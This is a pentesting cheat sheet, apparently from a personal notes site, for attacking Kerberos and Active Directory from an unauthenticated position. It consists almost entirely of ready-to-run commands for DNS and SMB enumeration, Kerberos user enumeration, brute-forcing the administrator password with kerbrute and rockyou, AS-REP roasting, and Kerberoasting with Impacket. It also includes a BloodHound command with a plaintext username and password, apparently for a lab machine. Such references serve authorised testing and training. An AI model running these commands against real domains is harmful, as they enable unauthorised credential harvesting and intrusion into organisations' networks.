Skip to content

88,464 - Pentesting kerberos

Recon Active Directory (No creds/sessions)

If you just have access to an AD environment but you don't have any credentials/sessions

Pentest the network Scan the network, find machines and open ports and try to exploit vulnerabilities or extract credentials from them (for example, Enumerating DNS could give information about key servers in the domain as web, printers, shares, vpn, media, etc.

gobuster dns -d $DOMAIN -r $IP -t 25 --wildcard -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Check for null and Guest access on smb services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" $DCIP && enum4linux -a -u "guest" -p "" $DCIP

smbmap -u "" -p "" -P 445 -H $DCIP && smbmap -u "guest" -p "" -P 445 -H $DCIP
smbclient -U '%' -L //$DCIP && smbclient -U 'guest%' -L //

Enumerate Ldap

nmap -n -sV --script "ldap* and not brute" -p 389 $DCIP

User enumeration

nmap

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" $IP
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='$DOMAIN',userdb=/root/Desktop/usernames.txt $IP

crackmapexec

crackmapexec smb $DOMAIN -u '' -p '' --users

kerbrute - users enumeration

LIST_1='/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt'
LIST_2='/usr/share/wordlists/seclists/Usernames/Names/names.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum --dc $DOMAIN -d $DOMAIN $LIST_1

kerbrute - users bruteforce

USER='administrator'
PASS='/usr/share/wordlists/rockyou.txt'
DOMAIN='spookysec.local'

/opt/windows/kerbrute bruteuser --dc $DOMAIN -d $DOMAIN $PASS $USER -v

This attack looks for users without Kerberos pre-authentication required attribute.

/opt/tools/impacket/examples/GetNPUsers.py "$DOMAIN/" -usersfile users.txt -no-pass -dc-ip $IP

Kerberoast - harvest TGS tickets for services

/opt/tools/impacket/examples/GetUserSPNs.py -request -dc-ip $DCIP $DOMAIN/<USERNAME>

With user creds

BloodHound

/opt/windows/BloodHound.py-1.0.1/bloodhound.py -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248